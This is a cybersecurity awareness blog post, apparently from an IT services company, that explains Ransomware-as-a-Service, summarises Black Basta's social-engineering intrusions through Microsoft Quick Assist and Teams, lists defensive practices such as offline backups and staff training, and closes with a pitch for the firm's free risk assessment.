Ransomware is one of those terms that people know they should fear, but they don’t always know why — until their computer files are locked, and a cybercriminal attaches a very expensive price tag to releasing the data.
It’s the stuff of nightmares for individuals, and now Ransomware-as-a-Service (RaaS) is a new twist on the old game that’s keeping business owners and IT professionals up at night, too.
What is Ransomware-as-a-Service?
Ransomware-as-a-Service (RaaS) rips off the Software-as-a-Service (SaaS) business model, giving ill-intentioned people with limited technical skills access to ready-made malware. No more deliberate development of malware to launch an attack, and no need to have programming proficiency. Anyone can be a bad actor.
Of course, RaaS developers aren’t in the business of giving away their ransomware tools. Revenue streams typically follow one of four setups:
- A flat-fee monthly subscription
- An affiliate program that requires subscribers to share profits with developers
- Licensing fee that eliminates profit sharing
- Straight profit sharing
To sweeten the pot for paying would-be cybercriminals, RaaS providers commonly provide portals, Bitcoin pay options, support communities, and other benefits strikingly similar to what legitimate SaaS customers receive. On its face, everything appears on the up-and-up — until the ill intent is revealed.
Black Basta Demonstrates RaaS Pervasiveness
I find the ease of RaaS particularly troublesome. Attacks are more frequent, unpredictable, specialized, and can be incredibly sophisticated. RaaS affiliates who organize into groups to run targeted campaigns can be particularly insidious.
Earlier this year, one such ransomware affiliate group known as Black Basta launched a multi-pronged attack, using Microsoft’s Quick Assist as a point of entry. Black Basta’s goal centers around impersonating IT or help desk personnel either through phishing scams, vishing (voice phishing) or frequent email delivery (email bomb attacks) to gain Quick Assist remote access to unsuspecting employees’ computers under the guise of needing to fix an issue.
Once they gain remote access, the Black Basta affiliates execute cURL scripts to download batch or ZIP files to infect systems with Qakbot, ScreenConnect, NetSupport Manager, and Cobalt Strike tools that ultimately help perpetuate the attack chain and malware deployment.
Turns out Black Basta isn’t stopping with Microsoft Quick Assist. Recent activity also shows the affiliates are using Microsoft Teams to execute their attack in similar fashion to their Quick Assist ploy. Credential theft through EvilProxy, batch scripts, and SystemBC deployment to maintain control of compromised systems ensue, wreaking havoc within global enterprise systems using these Microsoft tools.
Unfortunately, this example isn’t a random cautionary tale I made up to illustrate a point. It’s very real and speaks to the considerable risk RaaS introduces at the enterprise level. It also points to how businesses of any size are vulnerable in ways beyond the initial file lockout. Every minute spent dealing with an attack has costly consequences, including:
- Downtime and lost productivity
- Potential data breaches and compliance issues
- Damage to your reputation
The Best Defense is a Good Offense
The further RaaS allows bad actors to move away from traditional cyberattacks, the less effective some reactive cybersecurity measures become. That’s the bad news. The good news is that there are ways to effectively combat this level of cyber insecurity.
Control What You Can Control
Reviewing the steps you take to combat traditional ransomware attacks and strengthening best practices can be effective in warding off RaaS strikes:
- Create and enforce an incident response plan that formalizes the steps to take if an attack occurs
- Maintain a regular cadence of comprehensive backups, and keep backup systems stored offline (and offsite)
- Add or update firewalls, antivirus, intrusion detection systems, and other endpoint protections
- Invest in ongoing cybersecurity awareness training for all employees to increase knowledge of cyberattack schemes, and how to prevent them
Don’t Go It Alone
As cybercriminals and their attacks become more complex and pervasive, partnering with a provider with a track record of proven fully managed and co-managed technology services is a crucial investment.
Elevity is a trusted IT partner to customers in a range of industries. I can confidently say that the tools and expertise we offer are powerful solutions, and our commitment to customizing protections to your unique needs adds exceptional value and peace of mind.
Let’s explore how we can work together to keep RaaS bad actors from breaching your system. We offer a free cybersecurity risk assessment tool that asks key questions about important topics, such as security awareness, software, defenses against malware infection and more.
Click the link below to take the quick and convenient assessment, and we’ll be in touch with possible next steps on how you can ensure you’re as airtight on your cybersecurity as possible.